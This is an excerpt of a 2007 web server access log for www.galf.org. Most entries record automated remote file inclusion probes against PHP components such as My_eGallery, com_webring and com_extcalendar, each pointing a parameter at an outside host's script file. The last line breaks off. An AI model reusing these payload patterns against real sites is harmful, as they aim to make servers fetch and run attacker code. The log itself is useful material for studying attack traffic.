195.225.169.73 - - [16/Sep/2007:23:55:03 -0700] "GET /index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.46.176.233 - - [16/Sep/2007:23:55:34 -0700] "GET /logs/access_070625.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
66.46.176.233 - - [16/Sep/2007:23:55:34 -0700] "GET /logs/access_070625.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.112.166.87 - - [16/Sep/2007:23:55:47 -0700] "GET /logs/access.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.112.166.87 - - [16/Sep/2007:23:55:47 -0700] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.112.166.87 - - [16/Sep/2007:23:55:48 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
195.225.169.73 - - [16/Sep/2007:23:55:51 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.225.169.73 - - [16/Sep/2007:23:55:51 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.225.169.73 - - [16/Sep/2007:23:55:51 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.225.169.73 - - [16/Sep/2007:23:55:51 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.225.169.73 - - [16/Sep/2007:23:57:04 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.225.169.73 - - [16/Sep/2007:23:57:04 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
69.93.186.130 - - [16/Sep/2007:23:57:34 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://nogglenk.com/ngk.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
75.0.141.110 - - [16/Sep/2007:23:57:37 -0700] "GET /logs/access_070625.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
80.242.195.25 - - [16/Sep/2007:23:57:54 -0700] "GET /logs/access_070611.log HTTP/1.1" 200 443571 "http://www.google.ch/search?hl=de&q=80.242.195.25&btnG=Google-Suche&meta=" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.galf.org"
80.242.195.25 - - [16/Sep/2007:23:57:55 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.galf.org"
74.6.26.24 - - [16/Sep/2007:23:58:03 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
195.225.169.73 - - [16/Sep/2007:23:58:08 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.225.169.73 - - [16/Sep/2007:23:58:09 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.30.216.100 - - [16/Sep/2007:23:58:13 -0700] "GET /logs/access_070806.log HTTP/1.0" 200 851968 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
195.225.169.73 - - [17/Sep/2007:00:00:22 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.225.169.73 - - [17/Sep/2007:00:00:22 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.46.176.233 - - [17/Sep/2007:00:00:58 -0700] "GET /logs/access.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1